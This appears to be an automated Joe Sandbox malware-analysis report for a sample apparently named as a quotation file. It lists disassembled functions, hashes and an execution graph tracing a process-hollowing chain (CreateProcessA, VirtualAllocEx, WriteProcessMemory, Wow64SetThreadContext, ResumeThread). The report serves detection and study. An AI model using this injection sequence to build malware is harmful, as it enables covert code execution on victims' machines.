                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2222239885
                                        • Opcode ID: 02492e4790ca3535f54cb702ea72e2a9ca10b1f3c789a2225284727f775606e8
                                        • Instruction ID: 805747dfc0a2eb22b020213c3c2f230ec69e7c8c0f5de6052906f077848a762e
                                        • Opcode Fuzzy Hash: 02492e4790ca3535f54cb702ea72e2a9ca10b1f3c789a2225284727f775606e8
                                        • Instruction Fuzzy Hash: 72123C70E002298FDB68DFA5C954AAEB7F6BF84304F208969D009AF754DB309D85CF85
                                        Function 0693AA48 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-3823777903
                                        • Opcode ID: aa2d19118a3e81c9cb77e98f62f3db2bf226b1fc7ae49a0afcdca68e111f4fb7
                                        • Instruction ID: d4b24c524fe486f62c3cb0e2fcc33ca2662c3affa53835f1eeb1048b8f23f4c6
                                        • Opcode Fuzzy Hash: aa2d19118a3e81c9cb77e98f62f3db2bf226b1fc7ae49a0afcdca68e111f4fb7
                                        • Instruction Fuzzy Hash: F1915B30A102199FDB68DF65D944BAEBBF6BF84300F208929D452DB694DB749C45CB90
                                        Function 069371B0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-390881366
                                        • Opcode ID: bd74f4af406b1d321e5e25653e02d08becedd46b443bee7858c4db689ddb93d5
                                        • Instruction ID: 09b203daa52bafe07bd941e035f1ee66122130057d6c42f1cb02556b0cbd4349
                                        • Opcode Fuzzy Hash: bd74f4af406b1d321e5e25653e02d08becedd46b443bee7858c4db689ddb93d5
                                        • Instruction Fuzzy Hash: 79F13C70A00219CFDB58EBA5D594B6EB7B7FF84300F248568D4069B768DB31EC86CB85
                                        Function 069384E8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: b2416bca6e7acd12268e4f55d2f0f68ec1163b79cdd6234ffc05a415f0241b92
                                        • Instruction ID: c59f6e3e1af9eb962562585bd4379323caa381cae6c2192c91626600a349859e
                                        • Opcode Fuzzy Hash: b2416bca6e7acd12268e4f55d2f0f68ec1163b79cdd6234ffc05a415f0241b92
                                        • Instruction Fuzzy Hash: 50B12A30E102188FDB54EB69D68466EB7B6BF84300F248829E416EB755DB75DC86CB81
                                        Function 0693ADD0 Relevance: 5.2, Strings: 4, Instructions: 172COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: 084bb72397be1e963ba4555b51362fa4274750ba9566a8015ddd1e0626b85def
                                        • Instruction ID: c239791402dcff815ba3e6cd2b3ccd3030b623cecc084894851003c71e6cb99a
                                        • Opcode Fuzzy Hash: 084bb72397be1e963ba4555b51362fa4274750ba9566a8015ddd1e0626b85def
                                        • Instruction Fuzzy Hash: 65519D30E102258FDFA5EB64E9806AEB7B6FF84300F24892AD456DBB54DB34DC45CB81
                                        Function 06938900 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR^q$LR^q$$^q$$^q
                                        • API String ID: 0-2454687669
                                        • Opcode ID: 129f12c7fd93adcb51756cbd9f692aa642e857593933e5d0a8c94a12b4a3cef9
                                        • Instruction ID: 35c908e679479b7810de9c0ff4d6766a3d93df9164bd965c50d294f771f6eadf
                                        • Opcode Fuzzy Hash: 129f12c7fd93adcb51756cbd9f692aa642e857593933e5d0a8c94a12b4a3cef9
                                        • Instruction Fuzzy Hash: 9D518030B102159FDB58EF29DA50B6AB7E6BF84310F248968E406DF7A5DB30EC45CB91
                                        Function 0693AE5C Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: 608a42a350119bb839af15f21d9a66096558dd7d56f1f03e875e2397366d8428
                                        • Instruction ID: 05bf410a1ee36dd493e6b58807b75851d7c3fc6cc6e61b3e2973ebf69ef8f2e8
                                        • Opcode Fuzzy Hash: 608a42a350119bb839af15f21d9a66096558dd7d56f1f03e875e2397366d8428
                                        • Instruction Fuzzy Hash: 0B416A34B102158FCF65EB64E680AAEB3F6FF84310B248A29D456DBB58DB34DC45CB80

                                        Execution Graph

                                        Execution Coverage:10.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:150
                                        Total number of Limit Nodes:15
                                        execution_graph 20199 d2b070 20202 d2b159 20199->20202 20200 d2b07f 20203 d2b19c 20202->20203 20204 d2b179 20202->20204 20203->20200 20204->20203 20205 d2b3a0 GetModuleHandleW 20204->20205 20206 d2b3cd 20205->20206 20206->20200 20376 d2d800 20377 d2d846 GetCurrentProcess 20376->20377 20379 d2d891 20377->20379 20380 d2d898 GetCurrentThread 20377->20380 20379->20380 20381 d2d8d5 GetCurrentProcess 20380->20381 20382 d2d8ce 20380->20382 20383 d2d90b 20381->20383 20382->20381 20384 d2d933 GetCurrentThreadId 20383->20384 20385 d2d964 20384->20385 20207 6ac1a86 20208 6ac1a8c 20207->20208 20209 6ac1a67 20207->20209 20214 6ac3bc6 20208->20214 20230 6ac3b50 20208->20230 20245 6ac3b60 20208->20245 20210 6ac1bff 20215 6ac3b54 20214->20215 20216 6ac3bc9 20214->20216 20222 6ac3b82 20215->20222 20260 6ac3fbf 20215->20260 20267 6ac42dd 20215->20267 20272 6ac4741 20215->20272 20277 6ac45c7 20215->20277 20281 6ac4286 20215->20281 20286 6ac43a4 20215->20286 20292 6ac420a 20215->20292 20299 6ac4073 20215->20299 20304 6ac4012 20215->20304 20309 6ac40d2 20215->20309 20313 6ac4270 20215->20313 20319 6ac4194 20215->20319 20216->20210 20222->20210 20231 6ac3b54 20230->20231 20232 6ac420a 4 API calls 20231->20232 20233 6ac3b82 20231->20233 20234 6ac43a4 2 API calls 20231->20234 20235 6ac4286 2 API calls 20231->20235 20236 6ac45c7 2 API calls 20231->20236 20237 6ac4741 2 API calls 20231->20237 20238 6ac42dd 2 API calls 20231->20238 20239 6ac3fbf 4 API calls 20231->20239 20240 6ac4194 4 API calls 20231->20240 20241 6ac4270 2 API calls 20231->20241 20242 6ac40d2 2 API calls 20231->20242 20243 6ac4012 2 API calls 20231->20243 20244 6ac4073 2 API calls 20231->20244 20232->20233 20233->20210 20234->20233 20235->20233 20236->20233 20237->20233 20238->20233 20239->20233 20240->20233 20241->20233 20242->20233 20243->20233 20244->20233 20246 6ac3b7a 20245->20246 20247 6ac420a 4 API calls 20246->20247 20248 6ac43a4 2 API calls 20246->20248 20249 6ac4286 2 API calls 20246->20249 20250 6ac45c7 2 API calls 20246->20250 20251 6ac4741 2 API calls 20246->20251 20252 6ac3b82 20246->20252 20253 6ac42dd 2 API calls 20246->20253 20254 6ac3fbf 4 API calls 20246->20254 20255 6ac4194 4 API calls 20246->20255 20256 6ac4270 2 API calls 20246->20256 20257 6ac40d2 2 API calls 20246->20257 20258 6ac4012 2 API calls 20246->20258 20259 6ac4073 2 API calls 20246->20259 20247->20252 20248->20252 20249->20252 20250->20252 20251->20252 20252->20210 20253->20252 20254->20252 20255->20252 20256->20252 20257->20252 20258->20252 20259->20252 20328 6ac15e5 20260->20328 20332 6ac15f0 20260->20332 20268 6ac4300 20267->20268 20336 6ac1368 20268->20336 20340 6ac1361 20268->20340 20269 6ac4564 20269->20222 20273 6ac401e 20272->20273 20273->20272 20274 6ac4865 20273->20274 20275 6ac1368 WriteProcessMemory 20273->20275 20276 6ac1361 WriteProcessMemory 20273->20276 20274->20222 20275->20273 20276->20273 20344 6ac12a8 20277->20344 20348 6ac12a7 20277->20348 20278 6ac45e5 20282 6ac428c 20281->20282 20284 6ac1368 WriteProcessMemory 20282->20284 20285 6ac1361 WriteProcessMemory 20282->20285 20283 6ac4122 20283->20222 20284->20283 20285->20283 20287 6ac445b 20286->20287 20288 6ac401e 20286->20288 20287->20222 20289 6ac4865 20288->20289 20290 6ac1368 WriteProcessMemory 20288->20290 20291 6ac1361 WriteProcessMemory 20288->20291 20289->20222 20290->20288 20291->20288 20352 6ac1458 20292->20352 20356 6ac1450 20292->20356 20293 6ac401e 20294 6ac445b 20293->20294 20295 6ac1368 WriteProcessMemory 20293->20295 20296 6ac1361 WriteProcessMemory 20293->20296 20294->20222 20295->20293 20296->20293 20300 6ac4079 20299->20300 20360 6ac08ab 20300->20360 20364 6ac08b0 20300->20364 20301 6ac409f 20301->20222 20305 6ac401e 20304->20305 20306 6ac4865 20305->20306 20307 6ac1368 WriteProcessMemory 20305->20307 20308 6ac1361 WriteProcessMemory 20305->20308 20306->20222 20307->20305 20308->20305 20368 6ac095b 20309->20368 20372 6ac0960 20309->20372 20310 6ac40ec 20310->20222 20314 6ac429d 20313->20314 20315 6ac46c0 20314->20315 20317 6ac1368 WriteProcessMemory 20314->20317 20318 6ac1361 WriteProcessMemory 20314->20318 20315->20222 20316 6ac4122 20316->20222 20317->20316 20318->20316 20320 6ac4491 20319->20320 20322 6ac408a 20320->20322 20323 6ac409f 20320->20323 20324 6ac095b Wow64SetThreadContext 20320->20324 20325 6ac0960 Wow64SetThreadContext 20320->20325 20321 6ac473b 20321->20222 20322->20321 20326 6ac08ab ResumeThread 20322->20326 20327 6ac08b0 ResumeThread 20322->20327 20323->20222 20324->20322 20325->20322 20326->20323 20327->20323 20329 6ac15f0 CreateProcessA 20328->20329 20331 6ac183b 20329->20331 20331->20331 20333 6ac1679 CreateProcessA 20332->20333 20335 6ac183b 20333->20335 20335->20335 20337 6ac13b0 WriteProcessMemory 20336->20337 20339 6ac1407 20337->20339 20339->20269 20341 6ac1368 WriteProcessMemory 20340->20341 20343 6ac1407 20341->20343 20343->20269 20345 6ac12e8 VirtualAllocEx 20344->20345 20347 6ac1325 20345->20347 20347->20278 20349 6ac12a8 VirtualAllocEx 20348->20349 20351 6ac1325 20349->20351 20351->20278 20353 6ac14a3 ReadProcessMemory 20352->20353 20355 6ac14e7 20353->20355 20355->20293 20357 6ac1458 ReadProcessMemory 20356->20357 20359 6ac14e7 20357->20359 20359->20293 20361 6ac08b0 ResumeThread 20360->20361 20363 6ac0921 20361->20363 20363->20301 20365 6ac08f0 ResumeThread 20364->20365 20367 6ac0921 20365->20367 20367->20301 20369 6ac09a5 Wow64SetThreadContext 20368->20369 20371 6ac09ed 20369->20371 20371->20310 20373 6ac09a5 Wow64SetThreadContext 20372->20373 20375 6ac09ed 20373->20375 20375->20310 20386 d2da48 DuplicateHandle 20387 d2dade 20386->20387 20388 6ac4d70 20389 6ac4efb 20388->20389 20391 6ac4d96 20388->20391 20391->20389 20392 6ac3264 20391->20392 20393 6ac4ff0 PostMessageW 20392->20393 20394 6ac505a 20393->20394 20394->20391

                                        Executed Functions

                                        Function 00D2D7F0 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 526 d2d7f0-d2d88f GetCurrentProcess 531 d2d891-d2d897 526->531 532 d2d898-d2d8cc GetCurrentThread 526->532 531->532 533 d2d8d5-d2d909 GetCurrentProcess 532->533 534 d2d8ce-d2d8d4 532->534 536 d2d912-d2d92d call d2d9cf 533->536 537 d2d90b-d2d911 533->537 534->533 540 d2d933-d2d962 GetCurrentThreadId 536->540 537->536 541 d2d964-d2d96a 540->541 542 d2d96b-d2d9cd 540->542 541->542
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 00D2D87E
                                        • GetCurrentThread.KERNEL32 ref: 00D2D8BB
                                        • GetCurrentProcess.KERNEL32 ref: 00D2D8F8
                                        • GetCurrentThreadId.KERNEL32 ref: 00D2D951
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1840078036.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_d20000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: b23eb805d5216263ff410192c356ee629000415bdd08a7f6d49a982d30d4eeed
                                        • Instruction ID: f28c9b7e24837d36fb8631c041742f93561f8f70092c3459a8b9764bd37e8f3a
                                        • Opcode Fuzzy Hash: b23eb805d5216263ff410192c356ee629000415bdd08a7f6d49a982d30d4eeed
                                        • Instruction Fuzzy Hash: A35155B0D00349CFDB14DFA9D588B9EBBF1AF88304F248469E449A73A1DB749984CF65
                                        Function 00D2D800 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 549 d2d800-d2d88f GetCurrentProcess 553 d2d891-d2d897 549->553 554 d2d898-d2d8cc GetCurrentThread 549->554 553->554 555 d2d8d5-d2d909 GetCurrentProcess 554->555 556 d2d8ce-d2d8d4 554->556 558 d2d912-d2d92d call d2d9cf 555->558 559 d2d90b-d2d911 555->559 556->555 562 d2d933-d2d962 GetCurrentThreadId 558->562 559->558 563 d2d964-d2d96a 562->563 564 d2d96b-d2d9cd 562->564 563->564
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 00D2D87E
                                        • GetCurrentThread.KERNEL32 ref: 00D2D8BB
                                        • GetCurrentProcess.KERNEL32 ref: 00D2D8F8
                                        • GetCurrentThreadId.KERNEL32 ref: 00D2D951
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1840078036.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_d20000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: e393747daca1d160398effdf40dec0fe9d80e891fd5bdb85ce324efe0f704711
                                        • Instruction ID: 61cc389c548d91df3f7c303d8d2857ccc678a7e41b757d10dae4a45ad136a471
                                        • Opcode Fuzzy Hash: e393747daca1d160398effdf40dec0fe9d80e891fd5bdb85ce324efe0f704711
                                        • Instruction Fuzzy Hash: 155125B0D00349CFDB14DFAAD588B9EBBF1AB88314F24C459E419A73A0DB749984CF65
                                        Function 06AC15E5 Relevance: 1.8, APIs: 1, Instructions: 251processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 637 6ac15e5-6ac1685 640 6ac16be-6ac16de 637->640 641 6ac1687-6ac1691 637->641 646 6ac1717-6ac1746 640->646 647 6ac16e0-6ac16ea 640->647 641->640 642 6ac1693-6ac1695 641->642 644 6ac16b8-6ac16bb 642->644 645 6ac1697-6ac16a1 642->645 644->640 648 6ac16a5-6ac16b4 645->648 649 6ac16a3 645->649 657 6ac177f-6ac1839 CreateProcessA 646->657 658 6ac1748-6ac1752 646->658 647->646 650 6ac16ec-6ac16ee 647->650 648->648 651 6ac16b6 648->651 649->648 652 6ac16f0-6ac16fa 650->652 653 6ac1711-6ac1714 650->653 651->644 655 6ac16fc 652->655 656 6ac16fe-6ac170d 652->656 653->646 655->656 656->656 659 6ac170f 656->659 669 6ac183b-6ac1841 657->669 670 6ac1842-6ac18c8 657->670 658->657 660 6ac1754-6ac1756 658->660 659->653 662 6ac1758-6ac1762 660->662 663 6ac1779-6ac177c 660->663 664 6ac1764 662->664 665 6ac1766-6ac1775 662->665 663->657 664->665 665->665 666 6ac1777 665->666 666->663 669->670 680 6ac18d8-6ac18dc 670->680 681 6ac18ca-6ac18ce 670->681 682 6ac18ec-6ac18f0 680->682 683 6ac18de-6ac18e2 680->683 681->680 684 6ac18d0 681->684 686 6ac1900-6ac1904 682->686 687 6ac18f2-6ac18f6 682->687 683->682 685 6ac18e4 683->685 684->680 685->682 689 6ac1916-6ac191d 686->689 690 6ac1906-6ac190c 686->690 687->686 688 6ac18f8 687->688 688->686 691 6ac191f-6ac192e 689->691 692 6ac1934 689->692 690->689 691->692 693 6ac1935 692->693 693->693
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06AC1826
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 0e0691afa6edf0486728065bd386b11bc9b018ff5f23a12bde3ad75805a18a09
                                        • Instruction ID: ee6a6b679f297ea8d2475cdd88f876587aa2e3315b758611abac345347fa4747
                                        • Opcode Fuzzy Hash: 0e0691afa6edf0486728065bd386b11bc9b018ff5f23a12bde3ad75805a18a09
                                        • Instruction Fuzzy Hash: 69A19C71E00219DFDB60EF69C841BEEBBB2FF48314F1485A9E808A7241DB749981CF91
                                        Function 06AC15F0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 695 6ac15f0-6ac1685 697 6ac16be-6ac16de 695->697 698 6ac1687-6ac1691 695->698 703 6ac1717-6ac1746 697->703 704 6ac16e0-6ac16ea 697->704 698->697 699 6ac1693-6ac1695 698->699 701 6ac16b8-6ac16bb 699->701 702 6ac1697-6ac16a1 699->702 701->697 705 6ac16a5-6ac16b4 702->705 706 6ac16a3 702->706 714 6ac177f-6ac1839 CreateProcessA 703->714 715 6ac1748-6ac1752 703->715 704->703 707 6ac16ec-6ac16ee 704->707 705->705 708 6ac16b6 705->708 706->705 709 6ac16f0-6ac16fa 707->709 710 6ac1711-6ac1714 707->710 708->701 712 6ac16fc 709->712 713 6ac16fe-6ac170d 709->713 710->703 712->713 713->713 716 6ac170f 713->716 726 6ac183b-6ac1841 714->726 727 6ac1842-6ac18c8 714->727 715->714 717 6ac1754-6ac1756 715->717 716->710 719 6ac1758-6ac1762 717->719 720 6ac1779-6ac177c 717->720 721 6ac1764 719->721 722 6ac1766-6ac1775 719->722 720->714 721->722 722->722 723 6ac1777 722->723 723->720 726->727 737 6ac18d8-6ac18dc 727->737 738 6ac18ca-6ac18ce 727->738 739 6ac18ec-6ac18f0 737->739 740 6ac18de-6ac18e2 737->740 738->737 741 6ac18d0 738->741 743 6ac1900-6ac1904 739->743 744 6ac18f2-6ac18f6 739->744 740->739 742 6ac18e4 740->742 741->737 742->739 746 6ac1916-6ac191d 743->746 747 6ac1906-6ac190c 743->747 744->743 745 6ac18f8 744->745 745->743 748 6ac191f-6ac192e 746->748 749 6ac1934 746->749 747->746 748->749 750 6ac1935 749->750 750->750
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06AC1826
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 723b1a7ed89e26508cef86180b0fd4543d867fc0059db744d741102d37208423
                                        • Instruction ID: 51714d7ea2e66dff38a4e80b4663d578ec508d4670a379c1d322d4bb909d06c0
                                        • Opcode Fuzzy Hash: 723b1a7ed89e26508cef86180b0fd4543d867fc0059db744d741102d37208423
                                        • Instruction Fuzzy Hash: 87918B71E00219CFDB50EFA9C841BEDBBB2FF48324F1485A9E808A7251DB749981CF91
                                        Function 00D2B159 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 752 d2b159-d2b177 753 d2b1a3-d2b1a7 752->753 754 d2b179-d2b186 call d2a4e0 752->754 755 d2b1bb-d2b1fc 753->755 756 d2b1a9-d2b1b3 753->756 761 d2b188 754->761 762 d2b19c 754->762 763 d2b209-d2b217 755->763 764 d2b1fe-d2b206 755->764 756->755 808 d2b18e call d2b3f0 761->808 809 d2b18e call d2b400 761->809 762->753 766 d2b23b-d2b23d 763->766 767 d2b219-d2b21e 763->767 764->763 765 d2b194-d2b196 765->762 768 d2b2d8-d2b398 765->768 769 d2b240-d2b247 766->769 770 d2b220-d2b227 call d2a4ec 767->770 771 d2b229 767->771 803 d2b3a0-d2b3cb GetModuleHandleW 768->803 804 d2b39a-d2b39d 768->804 773 d2b254-d2b25b 769->773 774 d2b249-d2b251 769->774 772 d2b22b-d2b239 770->772 771->772 772->769 777 d2b268-d2b271 call d2a4fc 773->777 778 d2b25d-d2b265 773->778 774->773 783 d2b273-d2b27b 777->783 784 d2b27e-d2b283 777->784 778->777 783->784 785 d2b2a1-d2b2ae 784->785 786 d2b285-d2b28c 784->786 793 d2b2b0-d2b2ce 785->793 794 d2b2d1-d2b2d7 785->794 786->785 788 d2b28e-d2b29e call d2a50c call d2a51c 786->788 788->785 793->794 805 d2b3d4-d2b3e8 803->805 806 d2b3cd-d2b3d3 803->806 804->803 806->805 808->765 809->765
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00D2B3BE
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1840078036.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_d20000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 6fca2e06a960980418bb233144a6a4c3bf0374874a1ee269c4daf539319206ee
                                        • Instruction ID: bd3d489456ea5621b3db64da0d955d299de828e4c8347241cffb41d95fe0f496
                                        • Opcode Fuzzy Hash: 6fca2e06a960980418bb233144a6a4c3bf0374874a1ee269c4daf539319206ee
                                        • Instruction Fuzzy Hash: 2C817370A00B148FD724DF29E44575ABBF1FF98318F048A2ED48ADBA40D7B4E845CBA4
                                        Function 00D25E75 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 838 d25e75-d25f41 CreateActCtxA 840 d25f43-d25f49 838->840 841 d25f4a-d25fa4 838->841 840->841 848 d25fb3-d25fb7 841->848 849 d25fa6-d25fa9 841->849 850 d25fc8 848->850 851 d25fb9-d25fc5 848->851 849->848 852 d25fc9 850->852 851->850 852->852
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 00D25F31
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1840078036.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_d20000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 8d5747aeaaf8624d4d9fd0ce9da8a14b2ebea3d5c12053da5ba8b3b2ab6f6ea4
                                        • Instruction ID: 130696a62866d9bb2bd85df0500431028b7a870de37591bbd5047d71756b2f78
                                        • Opcode Fuzzy Hash: 8d5747aeaaf8624d4d9fd0ce9da8a14b2ebea3d5c12053da5ba8b3b2ab6f6ea4
                                        • Instruction Fuzzy Hash: 1F41E3B0C00719CFDB24CFA9D984BDEBBB5BF49304F24806AD409AB255DB756946CFA0
                                        Function 00D249D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 854 d249d4-d25f41 CreateActCtxA 857 d25f43-d25f49 854->857 858 d25f4a-d25fa4 854->858 857->858 865 d25fb3-d25fb7 858->865 866 d25fa6-d25fa9 858->866 867 d25fc8 865->867 868 d25fb9-d25fc5 865->868 866->865 869 d25fc9 867->869 868->867 869->869
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 00D25F31
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1840078036.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_d20000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: c760cd90431a5e66f327277783de7e2921c76438ff1c0bce452cc7b706d97830
                                        • Instruction ID: 3ce0e4961d52b9f16d2d7a19105d408fb77b0e1e2d3a6a71906bd5d37f0776e4
                                        • Opcode Fuzzy Hash: c760cd90431a5e66f327277783de7e2921c76438ff1c0bce452cc7b706d97830
                                        • Instruction Fuzzy Hash: FD41E2B0C00B19CFDB24CFA9D944B9EBBF5BF49304F2480AAD409AB255DB756945CFA0
                                        Function 06AC1361 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 871 6ac1361-6ac13b6 874 6ac13b8-6ac13c4 871->874 875 6ac13c6-6ac1405 WriteProcessMemory 871->875 874->875 877 6ac140e-6ac143e 875->877 878 6ac1407-6ac140d 875->878 878->877
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06AC13F8
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 0a4eaabe12f7cc89d3323645a49856e862e613138f76492f1c2ee00e7b86f338
                                        • Instruction ID: 1ed3c3535a38af52b93f2001409fc17011c02c5acc840fcf5776675d1f2c6134
                                        • Opcode Fuzzy Hash: 0a4eaabe12f7cc89d3323645a49856e862e613138f76492f1c2ee00e7b86f338
                                        • Instruction Fuzzy Hash: 992155B19002499FCB10DFAAC881BDEBBF5FF48324F10842AE918A7241C7789945CBA0
                                        Function 06AC1450 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 892 6ac1450-6ac14e5 ReadProcessMemory 896 6ac14ee-6ac151e 892->896 897 6ac14e7-6ac14ed 892->897 897->896
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06AC14D8
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 7460c5759d1d0b811bd1b5c0473e9f743e678302a81def75c7190fdbef8d9176
                                        • Instruction ID: e7024be00d70bd911c99aff1796299e4deea005246aa12c2a114323b7c4bb93f
